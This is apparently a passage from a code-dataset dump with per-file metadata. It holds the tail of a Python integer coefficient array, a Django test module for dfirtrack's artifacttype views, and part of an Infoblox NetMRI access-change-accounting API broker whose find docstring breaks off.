[-6, 6, 0, 0, 6,-6, 0, 0,-4,-2, 0, 0, 4, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 3, 0, 0,-3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0,-2,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 4,-4, 0, 0,-4, 4, 0, 0, 2, 2, 0, 0,-2,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,-2, 0, 0, 2,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-6, 6, 0, 0, 6,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-4,-2, 0, 0, 4, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 3, 0, 0,-3, 3, 0, 0,-2,-1, 0, 0,-2,-1, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4,-4, 0, 0,-4, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2, 0, 0,-2,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,-2, 0, 0, 2,-2, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0],
[-6, 0, 6, 0, 6, 0,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0,-4, 0,-2, 0, 4, 0, 2, 0,-3, 0, 3, 0,-3, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-1, 0,-2, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0,-6, 0, 6, 0, 6, 0,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-4, 0,-2, 0, 4, 0, 2, 0,-3, 0, 3, 0,-3, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-1, 0,-2, 0,-1, 0],
[18,-18,-18,18,-18,18,18,-18,12, 6,-12,-6,-12,-6,12, 6,12,-12, 6,-6,-12,12,-6, 6, 9,-9,-9, 9, 9,-9,-9, 9, 8, 4, 4, 2,-8,-4,-4,-2, 6, 3,-6,-3, 6, 3,-6,-3, 6,-6, 3,-3, 6,-6, 3,-3, 4, 2, 2, 1, 4, 2, 2, 1],
[-12,12,12,-12,12,-12,-12,12,-6,-6, 6, 6, 6, 6,-6,-6,-8, 8,-4, 4, 8,-8, 4,-4,-6, 6, 6,-6,-6, 6, 6,-6,-4,-4,-2,-2, 4, 4, 2, 2,-3,-3, 3, 3,-3,-3, 3, 3,-4, 4,-2, 2,-4, 4,-2, 2,-2,-2,-1,-1,-2,-2,-1,-1],
[ 4, 0,-4, 0,-4, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 2, 0,-2, 0,-2, 0, 2, 0,-2, 0, 2, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,-4, 0,-4, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 2, 0,-2, 0,-2, 0, 2, 0,-2, 0, 2, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0],
[-12,12,12,-12,12,-12,-12,12,-8,-4, 8, 4, 8, 4,-8,-4,-6, 6,-6, 6, 6,-6, 6,-6,-6, 6, 6,-6,-6, 6, 6,-6,-4,-2,-4,-2, 4, 2, 4, 2,-4,-2, 4, 2,-4,-2, 4, 2,-3, 3,-3, 3,-3, 3,-3, 3,-2,-1,-2,-1,-2,-1,-2,-1],
[ 8,-8,-8, 8,-8, 8, 8,-8, 4, 4,-4,-4,-4,-4, 4, 4, 4,-4, 4,-4,-4, 4,-4, 4, 4,-4,-4, 4, 4,-4,-4, 4, 2, 2, 2, 2,-2,-2,-2,-2, 2, 2,-2,-2, 2, 2,-2,-2, 2,-2, 2,-2, 2,-2, 2,-2, 1, 1, 1, 1, 1, 1, 1, 1]])
# vim: set notw
| 179.742857
| 207
| 0.335956
| 4,106
| 12,582
| 1.029469
| 0.004871
| 1.317246
| 1.842441
| 2.318429
| 0.985806
| 0.984623
| 0.969955
| 0.958599
| 0.927845
| 0.918855
| 0
| 0.468394
| 0.288348
| 12,582
| 69
| 208
| 182.347826
| 0.003686
| 0.001033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015152
| 0
| 0.015152
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
4c7929a4977b67918a633d7f8bdd7366644d4cdc
| 8,295
|
py
|
Python
|
dfirtrack_artifacts/tests/artifacttype/test_artifacttype_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | 4
|
2020-03-06T17:37:09.000Z
|
2020-03-17T07:50:55.000Z
|
dfirtrack_artifacts/tests/artifacttype/test_artifacttype_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | null | null | null |
dfirtrack_artifacts/tests/artifacttype/test_artifacttype_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | 1
|
2020-03-06T20:54:52.000Z
|
2020-03-06T20:54:52.000Z
|
from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_artifacts.models import Artifacttype
import urllib.parse
class ArtifacttypeViewTestCase(TestCase):
    """ artifacttype view tests """

    # credentials for the shared test user created in setUpTestData;
    # centralized here instead of being repeated in every test method
    USERNAME = 'testuser_artifacttype'
    PASSWORD = '5HxLPaA1wWbphTcd2C3S'

    @classmethod
    def setUpTestData(cls):
        # create object
        Artifacttype.objects.create(artifacttype_name='artifacttype_1')
        # create user
        User.objects.create_user(username=cls.USERNAME, password=cls.PASSWORD)

    # --- helpers ---

    def _login(self):
        """ log the shared test user in """
        return self.client.login(username=self.USERNAME, password=self.PASSWORD)

    def _artifacttype(self):
        """ fetch the artifacttype created in setUpTestData """
        return Artifacttype.objects.get(artifacttype_name='artifacttype_1')

    def _assert_login_redirect(self, path):
        """ assert an anonymous GET of *path* redirects to the login view """
        # create url
        destination = '/login/?next=' + urllib.parse.quote(path, safe='')
        # get response
        response = self.client.get(path, follow=True)
        # compare
        self.assertRedirects(response, destination, status_code=302, target_status_code=200)

    # --- list view ---

    def test_artifacttype_list_not_logged_in(self):
        """ test list view """
        self._assert_login_redirect('/artifacts/artifacttype/')

    def test_artifacttype_list_logged_in(self):
        """ test list view """
        self._login()
        response = self.client.get('/artifacts/artifacttype/')
        self.assertEqual(response.status_code, 200)

    def test_artifacttype_list_template(self):
        """ test list view """
        self._login()
        response = self.client.get('/artifacts/artifacttype/')
        self.assertTemplateUsed(response, 'dfirtrack_artifacts/artifacttype/artifacttype_list.html')

    def test_artifacttype_list_get_user_context(self):
        """ test list view """
        self._login()
        response = self.client.get('/artifacts/artifacttype/')
        self.assertEqual(str(response.context['user']), self.USERNAME)

    # --- detail view ---

    def test_artifacttype_detail_not_logged_in(self):
        """ test detail view """
        artifacttype_1 = self._artifacttype()
        self._assert_login_redirect('/artifacts/artifacttype/detail/' + str(artifacttype_1.artifacttype_id) + '/')

    def test_artifacttype_detail_logged_in(self):
        """ test detail view """
        artifacttype_1 = self._artifacttype()
        self._login()
        response = self.client.get('/artifacts/artifacttype/detail/' + str(artifacttype_1.artifacttype_id) + '/')
        self.assertEqual(response.status_code, 200)

    def test_artifacttype_detail_template(self):
        """ test detail view """
        artifacttype_1 = self._artifacttype()
        self._login()
        response = self.client.get('/artifacts/artifacttype/detail/' + str(artifacttype_1.artifacttype_id) + '/')
        self.assertTemplateUsed(response, 'dfirtrack_artifacts/artifacttype/artifacttype_detail.html')

    def test_artifacttype_detail_get_user_context(self):
        """ test detail view """
        artifacttype_1 = self._artifacttype()
        self._login()
        response = self.client.get('/artifacts/artifacttype/detail/' + str(artifacttype_1.artifacttype_id) + '/')
        self.assertEqual(str(response.context['user']), self.USERNAME)

    # --- create view ---

    def test_artifacttype_create_not_logged_in(self):
        """ test create view """
        self._assert_login_redirect('/artifacts/artifacttype/create/')

    def test_artifacttype_create_logged_in(self):
        """ test create view """
        self._login()
        response = self.client.get('/artifacts/artifacttype/create/')
        self.assertEqual(response.status_code, 200)

    def test_artifacttype_create_template(self):
        """ test create view """
        self._login()
        response = self.client.get('/artifacts/artifacttype/create/')
        self.assertTemplateUsed(response, 'dfirtrack_artifacts/artifacttype/artifacttype_add.html')

    def test_artifacttype_create_get_user_context(self):
        """ test create view """
        self._login()
        response = self.client.get('/artifacts/artifacttype/create/')
        self.assertEqual(str(response.context['user']), self.USERNAME)

    # --- update view ---

    def test_artifacttype_update_not_logged_in(self):
        """ test update view """
        artifacttype_1 = self._artifacttype()
        self._assert_login_redirect('/artifacts/artifacttype/update/' + str(artifacttype_1.artifacttype_id) + '/')

    def test_artifacttype_update_logged_in(self):
        """ test update view """
        artifacttype_1 = self._artifacttype()
        self._login()
        response = self.client.get('/artifacts/artifacttype/update/' + str(artifacttype_1.artifacttype_id) + '/')
        self.assertEqual(response.status_code, 200)

    def test_artifacttype_update_template(self):
        """ test update view """
        artifacttype_1 = self._artifacttype()
        self._login()
        response = self.client.get('/artifacts/artifacttype/update/' + str(artifacttype_1.artifacttype_id) + '/')
        self.assertTemplateUsed(response, 'dfirtrack_artifacts/artifacttype/artifacttype_edit.html')

    def test_artifacttype_update_get_user_context(self):
        """ test update view """
        artifacttype_1 = self._artifacttype()
        self._login()
        response = self.client.get('/artifacts/artifacttype/update/' + str(artifacttype_1.artifacttype_id) + '/')
        self.assertEqual(str(response.context['user']), self.USERNAME)
| 43.203125
| 146
| 0.683062
| 834
| 8,295
| 6.604317
| 0.077938
| 0.050835
| 0.081699
| 0.066812
| 0.909949
| 0.881082
| 0.870552
| 0.862564
| 0.835694
| 0.813907
| 0
| 0.017422
| 0.204219
| 8,295
| 191
| 147
| 43.429319
| 0.816997
| 0.118023
| 0
| 0.54321
| 0
| 0
| 0.227362
| 0.162521
| 0
| 0
| 0
| 0
| 0.197531
| 1
| 0.209877
| false
| 0.160494
| 0.049383
| 0
| 0.271605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
91274be755aa99e6f40c07675e6ec3bddee8779a
| 69,350
|
py
|
Python
|
infoblox_netmri/api/broker/v3_6_0/access_change_accounting_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/access_change_accounting_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/access_change_accounting_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..broker import Broker
class AccessChangeAccountingBroker(Broker):
controller = "access_change_accountings"
def show(self, **kwargs):
"""Shows the details for the specified access change accounting.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param AccessChangeAccountingID: The internal NetMRI identifier for this access accounting element.
:type AccessChangeAccountingID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return access_change_accounting: The access change accounting identified by the specified AccessChangeAccountingID.
:rtype access_change_accounting: AccessChangeAccounting
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available access change accountings. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AccessChangeAccountingID: The internal NetMRI identifier for this access accounting element.
:type AccessChangeAccountingID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device for which we count the access statistics.
:type DeviceID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the access change accountings as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` AccessChangeAccountingID
:param sort: The data field(s) to use for sorting the output. Default is AccessChangeAccountingID. Valid values are AccessChangeAccountingID, DataSourceID, DeviceID, FilterSetAll, FilterSetUnused, FilterSetAdded, FilterSetRemoved, FilterAll, FilterUnused, FilterAdded, FilterRemoved, IPObjectAll, IPObjectUnused, IPObjectAdded, IPObjectRemoved, ServiceAll, ServiceUnused, ServiceAdded, ServiceRemoved, ACAFirstSeenTime, ACAStartTime, ACAEndTime, ACATimestamp, ACAChangedCols.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each AccessChangeAccounting. Valid values are AccessChangeAccountingID, DataSourceID, DeviceID, FilterSetAll, FilterSetUnused, FilterSetAdded, FilterSetRemoved, FilterAll, FilterUnused, FilterAdded, FilterRemoved, IPObjectAll, IPObjectUnused, IPObjectAdded, IPObjectRemoved, ServiceAll, ServiceUnused, ServiceAdded, ServiceRemoved, ACAFirstSeenTime, ACAStartTime, ACAEndTime, ACATimestamp, ACAChangedCols. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return access_change_accountings: An array of the AccessChangeAccounting objects that match the specified input criteria.
:rtype access_change_accountings: Array of AccessChangeAccounting
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available access change accountings matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ACAChangedCols: The fields that changed between this revision of the record and the previous revision.
:type ACAChangedCols: Array of String
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ACAEndTime: The ending effective time of this record, or empty if still in effect.
:type ACAEndTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ACAFirstSeenTime: The timestamp of when NetMRI recorded its first access statistic for this device.
:type ACAFirstSeenTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ACAStartTime: The starting effective time of this record.
:type ACAStartTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ACATimestamp: The date and time this record was collected or calculated.
:type ACATimestamp: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AccessChangeAccountingID: The internal NetMRI identifier for this access accounting element.
:type AccessChangeAccountingID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device for which we count the access statistics.
:type DeviceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterAdded: The number of rules added by provisioning with NetMRI (including rollback operations).
:type FilterAdded: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterAll: The number of all rules defined in the device's configuration.
:type FilterAll: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterRemoved: The number of rules removed by provisioning with NetMRI (including remediation).
:type FilterRemoved: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterSetAdded: The number of rule lists added by provisioning with NetMRI.
:type FilterSetAdded: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterSetAll: The number of all rule lists defined in the device's configuration.
:type FilterSetAll: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterSetRemoved: The number of rule lists removed by provisioning with NetMRI (including remediation).
:type FilterSetRemoved: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterSetUnused: The number of unused rule lists defined in the device's configuration.
:type FilterSetUnused: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterUnused: The number of unused rules defined in the device's configuration.
:type FilterUnused: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IPObjectAdded: The number of network objects added by provisioning with NetMRI.
:type IPObjectAdded: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IPObjectAll: The number of network objects defined in the device's configuration.
:type IPObjectAll: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IPObjectRemoved: The number of network objects removed by provisioning with NetMRI (including remediation).
:type IPObjectRemoved: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IPObjectUnused: The number of network objects defined in the device's configuration that are not used in the configuration.
:type IPObjectUnused: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ServiceAdded: The number of service objects added by provisioning with NetMRI.
:type ServiceAdded: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ServiceAll: The number of service objects defined in the device's configuration.
:type ServiceAll: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ServiceRemoved: The number of service objects removed by provisioning with NetMRI (including remediation).
:type ServiceRemoved: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ServiceUnused: The number of service objects defined in the device's configuration that are not used in the configuration.
:type ServiceUnused: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the access change accountings as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` AccessChangeAccountingID
:param sort: The data field(s) to use for sorting the output. Default is AccessChangeAccountingID. Valid values are AccessChangeAccountingID, DataSourceID, DeviceID, FilterSetAll, FilterSetUnused, FilterSetAdded, FilterSetRemoved, FilterAll, FilterUnused, FilterAdded, FilterRemoved, IPObjectAll, IPObjectUnused, IPObjectAdded, IPObjectRemoved, ServiceAll, ServiceUnused, ServiceAdded, ServiceRemoved, ACAFirstSeenTime, ACAStartTime, ACAEndTime, ACATimestamp, ACAChangedCols.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each AccessChangeAccounting. Valid values are AccessChangeAccountingID, DataSourceID, DeviceID, FilterSetAll, FilterSetUnused, FilterSetAdded, FilterSetRemoved, FilterAll, FilterUnused, FilterAdded, FilterRemoved, IPObjectAll, IPObjectUnused, IPObjectAdded, IPObjectRemoved, ServiceAll, ServiceUnused, ServiceAdded, ServiceRemoved, ACAFirstSeenTime, ACAStartTime, ACAEndTime, ACATimestamp, ACAChangedCols. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against access change accountings, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: ACAChangedCols, ACAEndTime, ACAFirstSeenTime, ACAStartTime, ACATimestamp, AccessChangeAccountingID, DataSourceID, DeviceID, FilterAdded, FilterAll, FilterRemoved, FilterSetAdded, FilterSetAll, FilterSetRemoved, FilterSetUnused, FilterUnused, IPObjectAdded, IPObjectAll, IPObjectRemoved, IPObjectUnused, ServiceAdded, ServiceAll, ServiceRemoved, ServiceUnused.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return access_change_accountings: An array of the AccessChangeAccounting objects that match the specified input criteria.
:rtype access_change_accountings: Array of AccessChangeAccounting
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available access change accountings matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: ACAChangedCols, ACAEndTime, ACAFirstSeenTime, ACAStartTime, ACATimestamp, AccessChangeAccountingID, DataSourceID, DeviceID, FilterAdded, FilterAll, FilterRemoved, FilterSetAdded, FilterSetAll, FilterSetRemoved, FilterSetUnused, FilterUnused, IPObjectAdded, IPObjectAll, IPObjectRemoved, IPObjectUnused, ServiceAdded, ServiceAll, ServiceRemoved, ServiceUnused.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ACAChangedCols: The operator to apply to the field ACAChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ACAChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ACAChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ACAChangedCols: If op_ACAChangedCols is specified, the field named in this input will be compared to the value in ACAChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ACAChangedCols must be specified if op_ACAChangedCols is specified.
:type val_f_ACAChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ACAChangedCols: If op_ACAChangedCols is specified, this value will be compared to the value in ACAChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ACAChangedCols must be specified if op_ACAChangedCols is specified.
:type val_c_ACAChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ACAEndTime: The operator to apply to the field ACAEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ACAEndTime: The ending effective time of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ACAEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ACAEndTime: If op_ACAEndTime is specified, the field named in this input will be compared to the value in ACAEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ACAEndTime must be specified if op_ACAEndTime is specified.
:type val_f_ACAEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ACAEndTime: If op_ACAEndTime is specified, this value will be compared to the value in ACAEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ACAEndTime must be specified if op_ACAEndTime is specified.
:type val_c_ACAEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ACAFirstSeenTime: The operator to apply to the field ACAFirstSeenTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ACAFirstSeenTime: The timestamp of when NetMRI recorded its first access statistic for this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ACAFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ACAFirstSeenTime: If op_ACAFirstSeenTime is specified, the field named in this input will be compared to the value in ACAFirstSeenTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ACAFirstSeenTime must be specified if op_ACAFirstSeenTime is specified.
:type val_f_ACAFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ACAFirstSeenTime: If op_ACAFirstSeenTime is specified, this value will be compared to the value in ACAFirstSeenTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ACAFirstSeenTime must be specified if op_ACAFirstSeenTime is specified.
:type val_c_ACAFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
